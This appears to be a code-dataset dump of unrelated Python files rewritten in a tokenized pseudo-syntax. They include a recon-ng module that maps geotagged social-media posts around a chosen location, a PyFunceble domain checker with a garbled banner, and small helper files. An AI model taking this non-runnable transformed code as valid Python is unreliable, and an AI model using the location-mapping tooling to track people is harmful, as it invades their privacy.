<import_from_stmt>recon.core.module BaseModule<import_stmt>codecs<import_stmt>os<import_stmt>re<import_stmt>time<import_stmt>webbrowser<class_stmt>Module(BaseModule)<block_start>meta={'name':'PushPin Report Generator' 'author':'<NAME> (@LaNMaSteR53)' 'description':'Creates HTML media and map reports for all of the PushPins stored in the database.' 'options':(('latitude' <none> <true> 'latitude of the epicenter') ('longitude' <none> <true> 'longitude of the epicenter') ('radius' <none> <true> 'radius from the epicenter in kilometers') ('map_filename' os.path.join(BaseModule.workspace 'pushpin_map.html') <true> 'path and filename for pushpin map report') ('media_filename' os.path.join(BaseModule.workspace 'pushpin_media.html') <true> 'path and filename for pushpin media report') ) }<def_stmt>remove_nl self x repl=''<block_start><return>re.sub('[\r\n]+' repl self.html_escape(x))<block_end><def_stmt>build_content self sources<block_start>icons={'flickr':'http://maps.google.com/mapfiles/ms/icons/orange-dot.png' 'instagram':'http://maps.google.com/mapfiles/ms/icons/pink-dot.png' 'picasa':'http://maps.google.com/mapfiles/ms/icons/purple-dot.png' 'shodan':'http://maps.google.com/mapfiles/ms/icons/yellow-dot.png' 'twitter':'http://maps.google.com/mapfiles/ms/icons/blue-dot.png' 'youtube':'http://maps.google.com/mapfiles/ms/icons/red-dot.png' }<line_sep>media_content=''<line_sep>map_content=''<line_sep>map_arrays=''<line_sep>map_checkboxes=''<for_stmt>source sources<block_start>count=source[0]<line_sep>source=source[1]<line_sep>map_arrays<augadd>'var %s = [];\n'%(source.lower())<line_sep>map_checkboxes<augadd>'<input type="checkbox" id="%s" onchange="toggleMarkers(\'%s\');" checked="checked"/>%s<br />\n'%(source.lower() source.lower() source)<line_sep>media_content<augadd>'<div class="media_column %s">\n<div class="media_header"><div class="media_summary">%s</div>%s</div>\n'%(source.lower() count source.capitalize())<line_sep>items=self.query('SELECT * FROM pushpins WHERE source=?' (source ))<line_sep>items.sort(key=<lambda>x:x[9] reverse=<true>)<for_stmt>item items<block_start>item=[self.to_unicode_str(x)<if>x<ne><none><else>u''<for>x item]<line_sep>media_content<augadd>'<div class="media_row"><div class="prof_cell"><a href="%s" target="_blank"><img class="prof_img rounded" src="%s" /></a></div><div class="data_cell"><div class="trigger" id="trigger" lat="%s" lon="%s">[<a href="%s" target="_blank">%s</a>] %s<br /><span class="time">%s</span></div></div></div>\n'%(item[4] item[5] item[7] item[8] item[3] item[2] self.remove_nl(item[6] '<br />') item[9])<line_sep>map_details="<table><tr><td class='prof_cell'><a href='%s' target='_blank'><img class='prof_img rounded' src='%s' /></a></td><td class='data_cell'>[<a href='%s' target='_blank'>%s</a>] %s<br /><span class='time'>%s</span></td></tr></table>"%(item[4] item[5] item[3] self.remove_nl(item[2]) self.remove_nl(item[6] '<br />') item[9])<line_sep>map_content<augadd>'add_marker({position: new google.maps.LatLng(%s,%s),title:"%s",icon:"%s",map:map},{details:"%s"}, "%s");\n'%(item[7] item[8] self.remove_nl(item[2]) icons[source.lower()] map_details source.lower())<block_end>media_content<augadd>'</div>\n'<block_end><return>(media_content ) (map_content map_arrays map_checkboxes)<block_end><def_stmt>write_markup self template filename content<block_start>temp_content=open(template).read()<line_sep>page=temp_content%content<with_stmt>codecs.open(filename 'wb' 'utf-8')<as>fp<block_start>fp.write(page)<block_end><block_end><def_stmt>module_run self<block_start>sources=self.query('SELECT COUNT(source), source FROM pushpins GROUP BY source')<line_sep>media_content,map_content=self.build_content(sources)<line_sep>meta_content=(self.options['latitude'] self.options['longitude'] self.options['radius'])<line_sep># create the media report
media_content=meta_content+media_content<line_sep>media_filename=self.options['media_filename']<line_sep>self.write_markup(os.path.join(self.data_path 'template_media.html') media_filename media_content)<line_sep>self.output('Media data written to \'%s\''%(media_filename))<line_sep># order the map_content tuple
map_content=meta_content+map_content<line_sep>order=[4 0 1 2 3 5]<line_sep>map_content=tuple([map_content[i]<for>i order])<line_sep># create the map report
map_filename=self.options['map_filename']<line_sep>self.write_markup(os.path.join(self.data_path 'template_map.html') map_filename map_content)<line_sep>self.output('Mapping data written to \'%s\''%(map_filename))<line_sep># open the reports in a browser
w=webbrowser.get()<line_sep>w.open(media_filename)<line_sep>time.sleep(2)<line_sep>w.open(map_filename)<block_end><block_end> |
"""
The tool to check the availability or syntax of domain, IP or URL.
::
โโโโโโโ โโโ โโโโโโโโโโโโโโ โโโโโโโ โโโ โโโโโโโโโโโโโโโโโโโโโโ โโโ โโโโโโโโ
โโโโโโโโโโโโ โโโโโโโโโโโโโโโ โโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโ
โโโโโโโโ โโโโโโโ โโโโโโ โโโ โโโโโโโโโ โโโโโโ โโโโโโ โโโโโโโโโโโ โโโโโโ
โโโโโโโ โโโโโ โโโโโโ โโโ โโโโโโโโโโโโโโโโ โโโโโโ โโโโโโโโโโโ โโโโโโ
โโโ โโโ โโโ โโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ โโโ โโโ โโโโโโโ โโโ โโโโโ โโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโ
Provides the base of all domain syntax checker.
Author:
<NAME>, @funilrys, contactTATAfunilrysTODTODcom
Special thanks:
https://pyfunceble.github.io/#/special-thanks
Contributors:
https://pyfunceble.github.io/#/contributors
Project link:
https://github.com/funilrys/PyFunceble
Project documentation:
https://pyfunceble.readthedocs.io/en/dev/
Project homepage:
https://pyfunceble.github.io/
License:
::
Copyright 2017, 2018, 2019, 2020, 2021 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""<import_stmt>functools<import_from_stmt>typing Optional Tuple<import_from_stmt>PyFunceble.checker.base CheckerBase<import_from_stmt>PyFunceble.dataset.iana IanaDataset<import_from_stmt>PyFunceble.dataset.public_suffix PublicSuffixDataset<class_stmt>DomainSyntaxCheckerBase(CheckerBase)<block_start>"""
Provides an interface to check the syntax of a second domain.
:param str subject:
Optional, The subject to work with.
"""<line_sep># pylint: disable=line-too-long
SPECIAL_USE_DOMAIN_NAMES_EXTENSIONS=["onion"]<line_sep>"""
Specifies the extension which are specified as "Special-Use Domain Names"
and supported by our project.
:type: list
.. seealso::
* `RFC6761`_
* `IANA Special-Use Domain Names`_ assignments.
* `RFC7686`_
.. _RFC6761: https://tools.ietf.org/html/rfc6761
.. _RFC7686: https://tools.ietf.org/html/rfc6761
.. _IANA Special-Use Domain Names: https://www.iana.org/assignments/special-use-domain-names/special-use-domain-names.txt
"""<line_sep>last_point_index:Optional[int]=<none><line_sep>"""
Saves the index of the last point.
"""<line_sep>iana_dataset:Optional[IanaDataset]=<none><line_sep>public_suffix_dataset:Optional[PublicSuffixDataset]=<none><def_stmt>__init__ self subject:Optional[str]=<none><arrow><none><block_start>self.iana_dataset=IanaDataset()<line_sep>self.public_suffix_dataset=PublicSuffixDataset()<line_sep>super().__init__(subject)<block_end><def_stmt>reset_last_point_index func# pylint: disable=no-self-argument
<block_start>"""
Resets the last point index before executing the decorated method.
"""<line_sep>@functools.wraps(func)<def_stmt>wrapper self *args **kwargs<block_start>self.last_point_index=<none><line_sep><return>func(self *args **kwargs)<block_end># pylint: disable=not-callable
<return>wrapper<block_end><def_stmt>find_last_point_index func# pylint: disable=no-self-argument
<block_start>"""
Try to find the index of the last point after the execution of the
decorated method.
"""<line_sep>@functools.wraps(func)<def_stmt>wrapper self *args **kwargs<block_start>result=func(self *args **kwargs)# pylint: disable=not-callable
self.last_point_index=self.get_last_point_index(self.idna_subject)<line_sep><return>result<block_end><return>wrapper<block_end>@CheckerBase.subject.setter@reset_last_point_index@find_last_point_index<def_stmt>subject self value:str<block_start>"""
Sets the subject to work with.
:param value:
The subject to set.
:raise TypeError:
When the given :code:`value` is not a :py:class:`str`.
:raise ValueError:
When the given :code:`value` is empty.
"""<line_sep># pylint: disable=no-member
super(DomainSyntaxCheckerBase self.__class__).subject.fset(self value)<block_end>@staticmethod<def_stmt>get_last_point_index subject:str<arrow>Optional[int]<block_start>"""
Provides the index of the last point of the given subject.
"""<try_stmt><block_start><if_stmt>subject.endswith(".")<block_start><return>subject[:-1].rfind(".")<block_end><return>subject.rindex(".")<block_end><except_stmt>ValueError<block_start><return><none><block_end><block_end><def_stmt>get_subject_without_suffix self subject:str extension:str<arrow>Optional[Tuple[Optional[int] Optional[str]]]<block_start>"""
Provides the given subject without the suffix.
:param subject:
The subject to work with.
:param extension:
The extension previously extracted.
"""<if_stmt>extension<in>self.public_suffix_dataset<block_start><for_stmt>suffix self.public_suffix_dataset.get_available_suffix(extension)<block_start><try_stmt><block_start><return>subject[:subject.rindex(f".{suffix}")] suffix<block_end><except_stmt>ValueError<block_start><continue><block_end><block_end><block_end><return><none> <none><block_end>@CheckerBase.ensure_subject_is_given<def_stmt>get_extension self<arrow>Optional[str]<block_start>"""
Provides the extension to work with (if exists).
"""<if_stmt>self.last_point_index<is><none><block_start><return><none><block_end># Plus one is for the leading point.
extension=self.idna_subject[self.last_point_index+1:]<if_stmt>extension.endswith(".")<block_start>extension=extension[:-1]<block_end><return>extension<block_end><def_stmt>is_valid self<arrow>bool<block_start>"""
Validate the given subject.
"""<line_sep><raise>NotImplementedError()<block_end><block_end> |
<import_from_stmt>os.path abspath dirname join<line_sep>WORLDGEN_ROOT_PATH=abspath(join(dirname(__file__) '..' '..'))<def_stmt>worldgen_path *args<block_start>"""
Returns an absolute path from a path relative to the mujoco_worldgen repository
root directory.
"""<line_sep><return>join(WORLDGEN_ROOT_PATH *args)<block_end> |
# + tags=["parameters"]
1+1<line_sep> |
<import_from_stmt>django.apps AppConfig<class_stmt>CodesamplesAppConfig(AppConfig)<block_start>name='codesamples'<block_end> |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.